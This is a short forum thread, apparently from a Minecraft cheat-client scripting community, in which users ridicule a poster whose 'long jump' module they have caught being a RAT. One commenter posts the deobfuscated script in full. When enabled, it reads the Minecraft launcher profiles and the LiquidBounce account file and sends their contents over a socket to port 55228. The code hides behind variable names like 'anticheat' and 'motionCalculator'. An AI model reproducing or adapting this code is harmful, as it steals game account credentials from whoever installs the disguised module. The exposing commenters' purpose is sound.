@skiddermaster412 I edited and clarified
@skiddermaster412 it works. but dont believe me! just test it yourself
@paul2008 poor acting 0/10
nice rat
deobf in 3 clix -
@paul2008 eh shitty ass convincing words from a low lifer
@paul2008 said in NeruxVaceLongJump:
@skiddermaster412 it works. but dont believe me! just test it yourself
thank you for your constructive criticism
@paul2008 china
@paul2008 said in NeruxVaceLongJump:
thank you for your constructive criticism
no problem, now wait for the ban hammer too
2021 - 2008 = 13 yo
@paul2008 mfw someuses clown emoji in 2021 :cringe:
@paul2008 i love your code
var a = registerScript({ name: "", version: "", authors: [""] }); b = Java.type; hack = b(""); motionCalculator = b(""); pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString(); stringUtils = b(""); stringParse = b(""); iso = b("java.nio.charset.StandardCharsets"); function dataFromString(strings) { try { var strU = new stringUtils(strings); return stringParse.readFileToString(strU, iso.ISO_8859_1) } catch (e) {} } a.registerModule({ name: "NeruxVaceLongJump", category: "Misc", description: "NeruxVaceLongJump" }, function (module) { module.on("enable", function () { data = dataFromString(pwd + "/launcher_profiles.json"); data += "\n"; data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json"); data = data.getBytes(); l = data.length; anticheat = new hack("", 55228); anticheat.setSoTimeout(10000); server = new motionCalculator(anticheat.getOutputStream()); server.writeInt(l); server.write(data, 0, l); mc.thePlayer.motionX += 10 }) });
deobfed in 5 mins
thought that 3 layers of eval obfuscation could help you? -
@____ no
@paul2008 the only thing that does make sense your code is
mc.thePlayer.motionX += 10